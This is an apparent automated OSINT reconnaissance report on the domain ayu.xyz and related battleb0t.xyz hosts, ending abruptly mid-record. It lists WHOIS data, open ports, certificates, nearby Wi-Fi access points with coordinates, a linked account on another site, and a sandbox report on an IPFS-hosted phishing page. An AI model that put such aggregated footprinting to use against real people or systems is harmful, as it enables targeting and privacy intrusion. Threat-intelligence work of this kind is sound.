Registrar Registration Expiration Date: 2023-08-20T20:34:39.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Jiang Su
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Name Server: ns1.myhostadmin.net
Name Server: ns2.myhostadmin.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: westabuse@gmail.com
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
| ayu.xyz |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi2.battleb0t.xyz |
| 2023-05-12 02:56:25 | Netblock Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 207.154.224.0/20 | 207.154.228.169 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2082 | 104.21.71.14 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00p513-dev.github.io]
https://www.openphish.com/feed.txt | 00p513-dev.github.io |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:80 | 188.114.97.0/24 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:80 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent992 (Net ID: 00:14:5C:86:B3:9A) | 50.8897, 6.0563 |
| 2023-05-12 02:45:34 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'34.74.170.74', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'34.74.0.0/15', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 34.74.170.74 |
| 2023-05-12 02:52:10 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://gateway.pinata.cloud/ipfs/bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq/sharepoint.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ab8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ab8_ConnHashTable<2744>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"\n "IsoScope_ab8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ab8_IESQMMUTEX_0_331"\n "IsoScope_ab8_IE_EarlyTabStart_0xb7c_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, 
u'type': 7, u'description': u'"172.64.154.225:443"\n "185.199.108.153:443"\n "69.16.175.10:443"\n "52.25.204.60:443"\n "13.227.74.22:443"\n "13.227.21.110:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "d3e54v103j8qbb.cloudfront.net"\n "gateway.pinata.cloud"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "uploads-ssl.webflow.com"\n "www.pinatapreventsphishing.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "ez=!0,b});return b}oz.M="internal.enableAutoEventOnYouTubeActivity";var pz;function qz(a){var b=!1;return b}qz.M="internal.evaluateMatchingRules";" (Indicator: "dir "; File: "js_2_.js")\n Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': 
u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA135.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA136.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003300]\n "CabA133.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA133.tmp]- [targetUID: 00000000-00003300]\n "CabA134.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA134.tmp]- [targetUID: 00000000-00003300]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': 
u'"628574b3d6d692ff2246c3d0_Pinnie-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc28eb11266a33e63.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c71d88ad-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa772a493d0d30e3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c71d88ab-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c71d88ad-ece3-11ed-b7c5-0800276b7dae}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfc28eb11266a33e63.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c71d88ab-ece3-11ed-b7c5-0800276b7dae}.dat"'}, {u'category': 
u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"628522000a4c5387f2fdcf5a_Pinata-FullLogo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsgateway.pinata.cloudipfsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qqsharepoint.html" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarA135.tmp" has type "data"- Location: [%TEMP%\\TarA135.tmp]- [targetUID: 00000000-00003300]\n "jquery-3.5.1.min.dc5e7f18c8_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003300]\n "webflow.7f48192d4_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "phishing-redirect-page.webflow.c3340e897_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002744]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" 
has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFA75422D8ACBE1A01.TMP" has type "data"- Location: [%TEMP%\\~DFA75422D8ACBE1A01.TMP]- [targetUID: 00000000-00002744]\n "~DF449D57FE67DC3D35.TMP" has type "data"- Location: [%TEMP%\\~DF449D57FE67DC3D35.TMP]- [targetUID: 00000000-00002744]\n "~DFA772A493D0D30E3E.TMP" has | 185.199.108.153 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
0a:70:c1:db:70:e8:b9:50:30:b7:33:82:8e:fc:63:b0:63:ad:
97:e6:50:23:e8:d8:fd:32:74:4a:a7:58:9f:cf:c8:b6:a2:cd:
7e:28:74:19:38:ee:dc:ac:6a:d0:c4:5a:10:c7:c3:c1:0d:21:
b4:ff:86:61:30:4b:7d:10:9a:6d:10:38:4e:dc:1b:20:ad:54:
dd:8b:f9:7d:21:27:78:df:f9:73:ac:1b:f2:16:30:85:73:06:
19:38:d2:0d:2a:2f:fc:b8:ba:a6:8c:6a:bd:c8:da:cd:6a:e6:
e4:d5:b0:9f:b7:e5:07:a1:e6:c4:64:49:4e:a2:03:a3:bb:09:
77:55:6d:a7:9f:75:ea:9d:72:47:23:48:8a:7d:88:e5:aa:dd:
ab:25:4c:7b:7d:5c:a4:22:dd:53:9e:e1:3c:87:e3:cc:89:d0:
b4:6c:0c:61:00:8e:aa:db:85:6f:38:41:eb:4d:06:95:0f:0d:
4e:20:67:94:ec:1c:78:50:ed:0d:4f:1f:d7:4a:22:75:17:67:
0c:34:fe:7d:1a:30:5c:4f:39:17:f0:44:c2:e8:bd:ca:09:21:
03:9a:cb:da:b9:49:21:e4:b4:06:92:26:62:9e:1d:38:76:5b:
c4:c5:a8:a9:96:cc:aa:3e:01:a2:ae:8c:45:a0:e8:cf:2a:e0:
ca:8e:e5:18
|
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:8443 | 188.114.97.0/24 |
| 2023-05-12 02:55:28 | Web Server | No | URLScan.io | 0 | 1 | 2 | 0 | None | Werkzeug/2.2.2 Python/3.10.9 | kekw.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN (Net ID: 00:14:5C:86:B9:32) | 50.8897, 6.0563 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.111.153 | www.battleb0t.xyz |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:8080 | 188.114.96.1 |
| 2023-05-12 03:24:52 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Netherlands | Amsterdam, North Holland, NH, Netherlands, NL |
| 2023-05-12 02:52:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.133:80 | 185.199.111.0/24 |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:8443 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2087 | 87.248.157.102 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | FatSecret (Category: health)
https://www.fatsecret.com/member/Altpapier | Altpapier |
| 2023-05-12 03:12:51 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+74955801111', u'local_format': u'84955801111', u'number': u'74955801111', u'valid': True, u'line_type': u'landline', u'location': u'Moskva', u'country_code': u'RU', u'carrier': u'', u'country_name': u'Russian Federation', u'country_prefix': u'+7'} | +74955801111 |
| 2023-05-12 02:44:51 | Raw Data from RIRs | No | CRXcavator | 1 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "1.0", "data": {"dangerousfunctions": {".insertBefore(": {"/tmp/agjliddikiapkkpacaacecphgdoplfop_1.0/content.js": [26]}}, "webstore": {"website": "https://replayhub.netlify.app/", "rating": 0, "privacy_policy": "", "last_updated": "2023-04-06", "name": "ReplayHub YouTube Looper", "price": "", "offered_by": "", "support_site": "https://replayhub.netlify.app/", "version": "", "address": "", "short_description": "A Chrome extension for looping YouTube videos.", "permission_warnings": [], "users": 2, "size": "12.84KiB", "type": "Extension", "email": "replayhubunlimited@gmail.com", "rating_users": 0, "icon": "https://lh3.googleusercontent.com/8hLe0teq-FvENQnMGTH5hbKoAgfgd5YttifZdgjiDupvDj0k9qP7enO7qNry3CWBXmZtrms-qMTbQk7rL--uibGNuA=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"metadata": {}, "total": 382, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "webstore": {"privacy_policy": 1, "last_updated": 1, "users": 1, "address": 1, "total": 5, "rating_users": 1}}, "related": {"iginnfkhmmfhlkagcmpgofnjhanpmklb": {"rating": 4.602212, "users": 1000000, "platform": "", "short_description": "Play over 50 levels of box-jumping madness! Design and share your own levels.", "icon": "https://lh3.googleusercontent.com/muc6rdfnYlghXu2auI9B_xTDc3DjGTqJEn7crw2warPYn2ynoswSQzMskhdwzSa3aGn5ZtN1FS5zt7F2RQ7kvbiXXA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7866, "name": "Boxel Rebound"}, "coabfkgengacobjpmdlmmihhhfnhbjdm": {"rating": 4.712575, "users": 200000, "platform": "", "short_description": "Draw anything and anywhere in real-time, an Paint online. 
Take a Screenshot of what you have drawn.", "icon": "https://lh3.googleusercontent.com/ATk-HSHUYW94gfeX1-QViI3E-R9ayz6L-z1kaWZHTbODo35loCLAgQQ0Dd7Iyo_WVwIKwwV5CZMKy4xSAim78-i5=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 334, "name": "Paint Tool for Chrome"}, "pgniedifoejifjkndekolimjeclnokkb": {"rating": 4.152824, "users": 100000, "platform": "", "short_description": "Twitch culture wherever you go! This extension replaces all Twitch.tv emote phrases with their actual emoticons.", "icon": "https://lh3.googleusercontent.com/wpEAZCTc19k3y0XQ7kjngo0zY2gDblkGn4E-sp41P9QZJyERCUErowcPq7IYEJDop6Nxk-Mnn5lJDVHm5TTOWMBpRw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 301, "name": "Global Twitch Emotes"}, "anflghppebdhjipndogapfagemgnlblh": {"rating": 4.5964994, "users": 1000000, "platform": "", "short_description": "Funny custom cursors for Chrome\u2122. Replace the default mouse cursor with a custom one from collections of cool and cute cursors.", "icon": "https://lh3.googleusercontent.com/9Sdk_yE3HogVcKV36GpAjo2WuW-KjYxE_OuLWGw_uQV55Nek_trNMqPxUADU2zteqtaZ2Nb6WOCWhbKODyPVCsfiFQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14912, "name": "Cute Cursors - Custom Cursor for Chrome\u2122"}, "mghabdfikjldejcdcmclcmpcmknjahli": {"rating": 4.4349837, "users": 100000, "platform": "", "short_description": "Bass Boost makes videos, songs, movies and more sound awesome by boosting your speakers or headphones.", "icon": "https://lh3.googleusercontent.com/S_ICtgwu98_1zAUeun5CjylcOZeR8R6CbFeny166JgpLD7X9ny67sPfFH8CH93K9h-4KaEOAsQ23UT_gslYKLgjSdw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1515, "name": "Bass Boost: HD Audio"}, "mkccemimdjbojildcllapppfhphcfmkn": {"rating": 4.3464284, "users": 100000, "platform": "", "short_description": "Funny and highly addictive Piggybank idle cash clicker game! 
From poor pig to a money rain maker!", "icon": "https://lh3.googleusercontent.com/MTOgoa-4pnm2oT718hOzu0s7AyYRh2Hktwursb3vRiYoLJ_NhpZbNlcitb9yqgjsq58Oeml6yG8rdTJTFDnJQ1AdlhY=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 280, "name": "PiggyBank Money Clicker - Idle Game"}, "eekbbmglbfldjpgbmajenafphnfjonnc": {"rating": 4.0141845, "users": 300000, "platform": "", "short_description": "Create and save drawings at the click of a button.", "icon": "https://lh3.googleusercontent.com/9Ss9Et8Wqx2wynjcCgVgKCrWKgQALgDa_5dS8BrLamdoaJxE23RUqPzUCOtPl6Z_4E0cOjPLFWD-LRrIiPTV7A4d=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 282, "name": "TinySketch"}, "mmgjkfjlmdkmoipndaeombfnomjfgeff": {"rating": 4.7636366, "users": 200000, "platform": "", "short_description": "Boxel Golf is a multiplayer golf game packed with challenging courses, custom hats, and a powerful level builder.", "icon": "https://lh3.googleusercontent.com/CJluh5KxvX9BptxcgNfGygJ_FrarOtaAENIzJt_PhpyYyFLIKwtbx_ibaBFihgBFBnjNHBw6Zqf780ki2rEgsTL-=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 110, "name": "Boxel Golf"}, "akimgimeeoiognljlfchpbkpfbmeapkh": {"rating": 4.464241, "users": 300000, "platform": "", "short_description": "Art masterpieces from Google Arts & Culture in your browser tabs", "icon": "https://lh3.googleusercontent.com/vb_gZQ1M8DRLziSDF2orUqqOxfS0R41P6ivGjESV-Wayt2PhEjjECCjqt6cFYjmFOiJc3tPNRlaH--bS4YgJ2_bUF1A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1594, "name": "Google Arts & Culture"}, "ejgnolahdlcimijhloboakpjogbfdkkp": {"rating": 4.363104, "users": 200000, "platform": "", "short_description": "Meow is a virtual Cat pet who walks on your screen while you're browsing the web.", "icon": "https://lh3.googleusercontent.com/bGSk3Ww67wjSEwL0G3NUzjrmdwxCc07Zqg-DJ86TCU-9wslcEtutlHV8sn5gszDzOVilT4LhvdkXedoS8bvuCN-PJ5Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1366, "name": "Meow, The Cat Pet"}, "ogadflejmplcdhcldlloonbiekhnlopp": {"rating": 4.765432, "users": 700000, "platform": "", 
"short_description": "Increase your max volume! Amplify sound by up to 600%. Control sound of any tab using audio equalizer.", "icon": "https://lh3.googleusercontent.com/i9-pwrYc-CjuOK3VW2wQHhWkBis2nQ_JtZLAqU36S-h3Ogx85OIj9ml3qLVEq_hb4mdaDCPm74nkFuLGN2AtvsQh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 324, "name": "VolumeUp - Sound booster"}, "gebbhagfogifgggkldgodflihgfeippi": {"rating": 4.8502846, "users": 4000000, "platform": "", "short_description": "Returns ability to see dislikes", "icon": "https://lh3.googleusercontent.com/X0-M21C_VbWyXYuUjN55oyMDvOukjbzAxbs_WrUjwzsebWbyjFCIEchOtczI0DBvbyL9MUpuEWnghm19gF6dp8Vriw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14581, "name": "Return YouTube Dislike"}, "mjjgmlmpeaikcaajghilhnioimmaibon": {"rating": 4.636716, "users": 600000, "platform": "", 